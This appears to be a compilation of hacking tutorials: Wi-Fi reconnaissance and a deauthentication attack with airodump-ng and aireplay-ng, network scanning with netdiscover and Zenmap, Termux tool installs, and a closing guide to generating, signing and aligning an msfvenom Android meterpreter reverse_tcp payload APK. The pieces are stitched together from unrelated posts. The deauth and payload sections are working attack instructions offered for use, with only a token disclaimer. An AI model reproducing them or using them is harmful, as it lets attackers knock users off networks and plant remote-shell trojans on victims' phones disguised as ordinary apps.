Pre-connection Attack Network Penetration test

Pre-connection Attack

Pre-connection attack is the first part of the network penetration testing. To perform this attack, we will look at the fundamentals like how to show all the networks around us, how to find the details of all the connected devices to a particular network. Once we know about the network and connected devices to it, we can disconnect any device without knowing the password of that device.

Following are the basic steps we will be going through to perform Pre-connection attack:

1. Wireless Interface in Monitor mode: In this step, we will change the mode of wireless device as Monitor mode.
2. About airodump-ng: In this step, we will use airodump-ng to list all the network around us and display useful information about them.
3. Run airodump-ng: In this step, we will see all the devices that are connected to a particular network and collect more information about it.
4. Deauthenticate the Wireless client: In this step, we can disconnect any device which is shown in the previous step using the aireplay-ng.

Wireless interface in Monitor Mode

This step is used to put your wireless card into Monitor mode. In Monitor mode, your card can listen to every packets that's around us. By default, the mode of wireless devices is set to "Managed" that means our wireless device will only capture packets that have our device's MAC address as the destination MAC. It will only capture packets that are actually directly to my Kali machine.

But we want to capture all the packets that are within our range even if the destination MAC is not our MAC or even without knowing the password of the target device. To do this, we need to set the mode as Monitor mode.

We can use iwconfig to see the wireless interfaces.

In the above image, you can see that the wireless interface wlan0 is in Managed mode. Use the following command to set it in Monitor mode.

Where

• ifconfig wlan0 down command is used for disabling the Managed mode
• airmon-ng check kill command is used to kill any process that could interfere with using my interface in monitor mode. After this command, your internet connection will be lost.
• iwconfig wlan0 mode monitor command is used to enable monitor mode
• ifconfig wlan0 up command is used to enable the interface
• iwconfig command shows that the mode is set to Monitor

In the above figure, you can see that the mode is changed as Monitor mode. Now we are able to capture all the Wi-Fi packets that are within our range even if the packets are not directed to our computer or even without knowing the password of the target network.

To do this, we need a program that can capture the packets for us. The program we are going to use is airodump-ng.

About airodump-ng

airdump-ng is used to list all the network around us and display useful information about them. It is a packet sniffer, so it is basically designed to capture all the packets around us while we are in Monitor mode. We can run it against all of the networks around us and collect useful information like the mac address, channel name, encryption type, number of clients connected to the network and then start targeting to the target network. We can also run it against certain AP(access point) so that we only capture packets from a certain Wi-Fi network.

Syntax

1. airodump-ng [MonitorModeInterface]

First, let's look at how to run the program. In this case, we need our Wi-Fi card in Monitor mode. The name of the our Wi-Fi card is wlan0.

Note: We can press Ctrl + C to stop the following execution.

• BSSID shows the MAC address of the target network
• PWR shows the signal strength of the network. Higher the number has better signal
• Beacons are the frames send by the network in order to broadcast its existence
• #Data, shows the number of data packets or the number of data frames
• #/s shows the number of data packets that we collect in the past 10 seconds
• CH shows the channel on which the network works on
• ENC shows the encryption used by the network. It can be WEP, OPN, WPA, WPA2
• CIPHER shows the cipher used in the network
• AUTH shows the authentication used on the network
• ESSID shows the name of the network

In the above image, you can show all the wireless networks like Oppo, perfe, Fligh, Ashu, LIFCA, Xiaom, BS1A-YW5 etc and the detailed information about all the network.

Run airodump-ng

In this step, we will run airodump-ng to see all the devices that are connected to a particular network and collect more information about it. Once we have a network to the target, it's useful to run airodump-ng on that network only, instead of running it on all the networks around us.

Currently, we are running airodump-ng on all the networks around us. Now we are going to target the network BS1A-YW5 whose BSSID is 50:C8:E5:AF:F6:33. We are going to sniff on that network only.

To do this, we will be use the same program. The command will be as follows:

Where

• --bssid 50:C8:E5:AF:F6:33 is the access point MAC address. It is used to eliminate extraneous traffic.
• --channel 11 is the channel for airodump-ng to snif on.
• --write test is used to store all the data in a file named as test. It is not mandatory, you can skip this part.
• wlan0 is the interface name in Monitor mode.

After execution of this command, the following devices will be shown:

Where

• BSSID of all the devices is same because devices are connected to the same network
• STATION shows the number of devices that are connected to this network
• PWR shows the power strength of each of the devices
• Rate shows the speed
• Lost shows the amount of data loss
• Frames show the number of frames that we have captured

After executing this command, we have 3 devices that are connected to the network BS1A-YW5 and all the devices have the same BSSID as 50:C8:E5:AF:F6:33.

Deauthenticate the wireless client

It is also known as deauthentication attacks. These attacks are very useful. These attacks allow us to disconnect any device from any network that is within our range even if the network has encryption or uses a key.

In deauthentication attack, we are going to pretend to be client and send a deauthentication packet to the router by changing our MAC address to the MAC address of the client and tell the router that we want to disconnect from you. At the same time, we are going to pretend to be router by changing our MAC address to the router's MAC address until the client that we are requesting to be disconnected. After this, the connection will be lost. Through this process, we can disconnect or deauthenticate any client from any network. To do this, we will use a tool called aireplay-ng.

First of all, we will run airodump-ng on the target network, because we want to see which clients or devices are connected to it. This time, we will not need the --write option, so we are just going to remove it. After completion the run process of airodump-ng, we are going to disconnect the device with STATION A8:7D:12:30:E9:A4 using the airoplay-ng.

Syntax

1. aireplay-ng --deauth [#DeauthPackets] -a [NetworkMac] -c [TargetMac] [Interface]

After executing this command, the device whose STATION is A8:7D:12:30, lost the internet connection. We can only connect to the network again when we quit this executing command by pressing Ctrl + C.

Where

• -deauth is used to tell airplay-ng that we want to run a deauthentication attack and assign 100000 which is the number of packets so that it keeps sending a deauthentication packets to both the router and client and keep the client disconnected.
• -a is used to specify the MAC address of the router. 50:C8:E5:AF:F6:33 is the target access point.
• -c specifies the MAC address of the client. A8:7D:12:30:E9:A4 is client's MAC address.
• wlan0 is the wireless adaptor in Monitor mode.

Post Attacks kali Ethical Hacking

Post-Connection Attacks

All the attacks that we performed in the pre-connection and gaining access section, we weren't connected to a network. In this section, we are going to be talking about post-connection attack that means the attacks that we can do after connecting to the network. Now, it doesn't matter that the network is a wireless or a wired network and it doesn't matter that the target was using the WEP or WPA key, we can launch all of the attacks that we're going to talk about in this section.

In all the previous attacks, we kept our wireless card in monitor mode, so that we could capture any packet that goes in the air. In this section, we're going to use our wireless card in managed mode because we have access to the network, so we really don't need to capture everything, we only want to capture packets that are directed to us.

In this section, we're going to look at the attacks that can perform when we break through the network. Firstly, we're going to use a tool netdiscover to gather all the important information about the network, and that information will help us to launch attacks. It is used to explore all the clients that are connected to a system. After this, we will learn a tool called Zenmap. This tool has a better interface and is more powerful than netdiscover. This tool is used to gather detailed information about all of the clients connected to the same network.

Netdiscover

The netdiscover is a tool which is used to gather all the important information about the network. It gathers information about the connected clients and the router. As for the connected clients, we'll be able to know their IP, MAC address and the operating system, as well as the ports that they have open in their devices. As for the router, it will help us to know the manufacturer of the router. Then we'll be able to look for vulnerabilities that we can use against the clients or against the router if we are trying to hack them.

In the Network penetration testing, we used airodump-ng to discover all the connected clients to the network. In the second part of the airodump-ng output, we learned how we could see the associated clients and their MAC addresses. All these details we can get before we connect to the target access point. Now, after connecting to the network, we can gather much more detailed information about these devices. To do this task, there are a lot of programs, but we're going to talk about two programs. Now start with the simplest and quickest one, netdiscover.

The netdiscover is a quicker and simplest program to use, but it doesn't show very detailed information about the target clients. It'll only show us their IP address, their MAC address, and sometimes the hardware manufacturer. We're going to use it by typing netdiscover, then we are going to use -r, and then we are going to specify the range, which can be any range we want. Looking at the IP (which is 10.0.2.1) tells us which network we are in. We want to discover all the clients that are in this network, so we're going to try and see if there is a device in 10.0.2.1. Then we're going to try 12, 13, 14, 15, 16, up to 254, that's the end of the range. So, to specify a whole range, we can write /24. That means we want 10.0.2.1, and then this IP is just going to increase up to 10.0.2.254, which is the end of the IP range in the network. The command for this is as follows:

Now hit Enter. It will return the output very fast, producing the result shown in the following screenshot:

In the above screenshot, we can see that we have four devices connected to the network. We have their IP address, MAC address, and the MAC Vendor. This method was very quick, and it just shows simple information.

Zenmap

Nmap(Network Mapper) is the second program that we're going to look. It is a huge tool and has many uses. Nmap is used to gather information about any device. Using the Nmap, we can gather information about any client that is within our network or outside our network, and we can gather information about clients just by knowing their IP. Nmap can be used to bypass firewalls, as well as all kinds of protection and security measures. In this section, we're going to learn some of the basic Nmap commands that can be used to discover clients that are connected to our network, and also discover the open ports on these clients.

We're going to use Zenmap, which is the graphical user interface for Nmap. If we type zenmap on the Terminal, we'll bring up the application like this:

In the Target field, we're going to put our IP address. In the Profile drop-down menu, we can have various profiles:

In the Target filed, if you want to gather information of only one IP address, we can just enter that address. We can also enter a range like we did with netdiscover. We're going to enter 198.168.1.1/24. Then we are going to select the Ping scan from the Profile drop-down menu and hit the Scan button:

The preceding scan is kind of a quick scan, but it doesn't show too much information, as we can see in the preceding screenshot. It only shows the connected devices. This scan is very quick. We are able to see the connected devices on the left-hand panel, and we can see their IP addresses, their MAC addresses, and their vendors.

The next scan we're going to learn is the Quick Scan. Now, the Quick scan is going to be slightly slower than the Ping scan. But in Quick scan, we will get more information than the Ping scan. We're going to be able to identify the open ports on each device:

In the above screenshot, we can see that it shows the open ports on each one of the discovering devices. The main router has an open port called 53/tcp. 80/tcp is the port used at the router setting page because it runs on a web server.

Now, let's take a look at the Quick scan plus, which take the Quick scan one step further. It's going to be slower than the Quick scan, but it will show us the programs that are running on the opened ports. So, in Quick scan, we saw that port 80 is open, but we didn't know what was running on port 80, and we saw that port 22 was running, but we didn't know what was running. We knew it was SSH, but we don't know what SSH server was running on that port.

So again, Quick scan plus will take longer than Quick scan, but it will gather more information, as shown in the following screenshot:

In the preceding screenshot, we can see that we have a Linux device connected. We can see that the operating system of the device is connected and that it also got us the version for the programs. In Quick scan, we only knew that port 22 was open but now we know that it's running, and the server is OpenSSH 4.7. Now we know that it was Apache HTTP server 2.2.8 and it was a Linux device. We can go ahead and look for exploits and vulnerabilities.

Programing enviroment in Termux

 Make a programming environment

We can install some programming languages like Python, C, Ruby, etc on Termux. 

Python

Python is the most used scripting language in hacking and penetration testing. We use it to automate stuff and build tools. Also, Python is highly used in mashing learning.

apt-get install python

C

C language is the core language of many other programming languages. You can learn computer architecture deeply if you get a good knowledge of C.

apt-get install clang

Ruby

If you want to install Metasploit on termux you need Ruby. Because MSF is coded in Ruby.

apt-get install ruby

Assembly

If you are planning to learn  hacking, Assembly is a must to learn. I suggest you write codes in C, Then disassemble them and learn Assembly.

apt-get install binutils

Turn your phone into a web server

You may know that using Python you can build a simple HTTP server. If you don't know about that read our python simple HTTP server tutorial.

You may use the following command to server on port 4444.

python -m SimpleHTTPServer 4444

Actually we install the apache server on your termux environment. Not only apache, PHP, and python also can be installed. So you can run a fully functional web server on your phone.

Some useful tools to install

Linux man pages

These are the Linux manual pages for programmers. There are hundreds of documents explaining various API s and tools. For example, if we want to know about the read() function in C you can just type "man read". It will open a page explaining how to work with read function.

You may install the manual pages with the following command.

apt-get install man

Nano editor

This is a simple text editor that can be used in the terminal. We use this tool often in Linux programming and text editing stuff. In the following image, you can see a screenshot of the nano editor.

 IP-Tracer

What is IP-Tracer ?

IP-Tracer is used to track an ip address. IP-Tracer is developed for Termux and Linux based systems. you can easily retrieve ip address information using IP-Tracer. IP-Tracer use ip-api to track ip address.

How to install IP-Tracer ?

$ apt update

$ apt install git -y

$ git clone https://github.com/rajkumardusad/IP-Tracer.git

$ cd IP-Tracer

$ chmod +x install

$ sh install or ./install

How to use IP-Tracer

trace -m to track your own ip address.

trace -t target-ip to track other's ip address for example ip-tracer -t 127.0.0.1

trace for more information.

OR

ip-tracer -m to track your own ip address.

ip-tracer -t target-ip to track other's ip address for example ip-tracer -t 127.0.0.1

ip-tracer for more information.

CYBER-SCAN

CyberScan is an open source penetration testing tool that can analyse packets , decoding , scanning ports, pinging and geolocation of an IP including (latitude, longitude , region , country ...)

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ apt install python

$ git clone https://github.com/medbenali/CyberScan.git

$ cd CyberScan

usage :

$ python2 CyberScan.py -v

$ CyberScan -h

We can perform ping operations with several protocols using CyberScan

The fastest way to discover hosts on a local Ethernet network

is to use ARP:

$ python2 CyberScan -s 192.168.1.0/24 -p arp

In case when ICMP echo requests are blocked, we can still use TCP:

$ CyberScan -s 192.168.1.105 -p tcp -d 80

192.168.1.105 = target IP.

Nikto web server scanner | Termux

Nikto web server scanner

Nikto is a web server assessment tool. 

The Nikto web server scanner is a security tool that will test a web site for thousands of possible security issues. Including dangerous files, mis-configured services, vulnerable scripts and other issues. It is open source and structured with plugins that extend the capabilities. These plugins are frequently updated with new security checks.

It is designed to find various default and insecure files, 

apconfigurations and programs on any type of web server 

Installation in Termux:

$ apt update && apt upgrade

$ apt install git 

$ apt install perl

$ git clone https://github.com/sullo/nikto

$ cd nikto

$ chmod +x *

usage :

perl nikto.pl -H

it shows all options how you can use this tool ...

 HOW TO Sign the APK File with Embedded Payload 

Hi MoboTherapy families welcome back

Today, I`m gonna show you: "How To Sign the APK File with Embedded Payload". I made this cause many of you asked me to solve  this error (This was built an older version of android and may not work properly.) The following Methods work 100%. So, Follow the steps carefully.

If you asked me why we have to sign the Apk file and here is why 

In Modern Android Phones, Unsigned APK files can be Easily installed. But Older versions of Android does not Support the installation of Unsigned APK files. This is not a common Problem. But for Publishers and Hackers, it can create a lot of problem, because Unsigned APK files give error on Older Android Versions & cannot be EVEN Uploaded on Google Play or Play Store.

To Manually & Properly Sign the APK, you have to Follow the Following steps Carefully!

Let's begin...

• Requirements

1). Kali Linux (Latest Version is Preferred)
2). ava v8 or above (Latest Version is Preferred)

3). ZipAlign Tool (Download it HERE , Install instructions included)

• Installation

1). Latest version of JAVA is already installed in Kali Linux. So you don`t need to download it Manually.

2). Zip-Align Tool can be found HERE. Installation instructions are Discussed there. If you have any Problems, you can install by type these commands

1. Update the package index:

    # sudo apt-get update

      

      2. Install zipalign deb package    

    # sudo apt-get install zipalign 

OR

1. Update the package index:

   # sudo apt-get update

2. Install google-android-build-tools-installer deb package:

   # sudo apt-get install google-android-build-tools-installer

3). Here I am gonna Generate a Key named key.jks for Kali.apk , which is already generated by msfvenom command

• Signing the APK File Manually

1). First, generate an Un-Signed APK File with Embedded Payload:

msfvenom -p android/meterpreter/reverse_tcp LHOST=(your-IP) LPORT=(desired-port) R > Kali.apk

2.) Now we are gonna Generate a key key.jks with KeyTool. For this, type in Terminal (screenshot Below):

 

  keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias my-alias

3). Enter a Rememberable KeyStore Password. (i.e. 123456)

4). Now, it will ask about your Personnel Information. Just Randomly fill the Form (i.e. like I do it above in the screenshot), and finally Type: yes , This will Successfully Generate a key.

5). BINGO...!!!!!!!! APK file has been signed. Now the most important step; Zip Aligning is Left, Just type the following command in terminal, and GET the Signed Kali.apk:

zipalign -v 4 Kali.apk Kali-Signed.apk

                                            DONE 

 You have Successfully Generated SIGNED APK 

                                             FILE

Location

Your Manually SIGNED Apk File, with Embedded Payload can be found here :

/root/payloadapk-Signed.apk

Note: This all about, there are many methods in the internet  this is not the only one you can check them if this method isn't satisfied you. I hope you can solve your problem and enjoy thank you.

DISCLAIMER : This Thread is only for Education Purposes. I will not be Responsible of Any Illegal use of this information. Try not to HACK the Androids, other than your`s.